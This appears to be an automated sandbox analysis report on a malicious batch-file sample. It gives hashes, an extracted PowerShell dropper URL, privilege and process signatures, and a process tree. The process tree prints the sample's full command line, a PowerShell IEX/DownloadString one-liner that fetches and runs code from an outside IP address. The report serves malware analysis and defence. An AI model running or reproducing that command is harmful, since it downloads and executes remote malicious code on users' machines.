Analysis
- max time kernel: 131s
- max time network: 69s
- platform: windows10_x64
- resource: win10v200430
- submitted: 21-05-2020 17:10
Static task: static1
Behavioral task: behavioral1
- Sample: 9e366799514a8ce5bccab4fc1af01e1f.bat
- Resource: win7v200430 (windows7_x64)
- 0 signatures, 0 seconds
Behavioral task: behavioral2
- Sample: 9e366799514a8ce5bccab4fc1af01e1f.bat
- Resource: win10v200430 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: 9e366799514a8ce5bccab4fc1af01e1f.bat
- Size: 213B
- MD5: 7563bdc5ef2e60e4af282d344dbde9ff
- SHA1: 87ec59517e50fe716e21c255f572e11e0b810619
- SHA256: a15036f075ca149cc6635c5eb2cb1bab41c2462e3ad0d2b36513aa29099d1424
- SHA512: 178d9cca7b3a22c9fa0c5eaa052397bf36c815d64999ed5dc05d4e5922fcd28e7807a3ba8e3811e472838ec7de9746aa5cbd778ae48268e6af92a78f347c3f5f
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Source: ps1.dropper
- URLs: http://185.103.242.78/pastes/9e366799514a8ce5bccab4fc1af01e1f
Signatures
- Program crash (1 IoC)
  Processes:
  pid   pid_target   process        target process
  2176  1928         WerFault.exe   powershell.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
  description                 pid    process
  Token: SeRestorePrivilege   2176   WerFault.exe
  Token: SeBackupPrivilege    2176   WerFault.exe
  Token: SeDebugPrivilege     2176   WerFault.exe
- Suspicious behavior: EnumeratesProcesses (14 IoCs)
  Processes:
  pid    process
  2176   WerFault.exe (14 occurrences)
Processes
- C:\Windows\system32\cmd.exe (depth 1, PID 1732)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9e366799514a8ce5bccab4fc1af01e1f.bat"
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2, PID 1928)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/9e366799514a8ce5bccab4fc1af01e1f');Invoke-CRSRXA;Start-Sleep -s 10000"
    - C:\Windows\SysWOW64\WerFault.exe (depth 3, PID 2176)
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 704
      Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses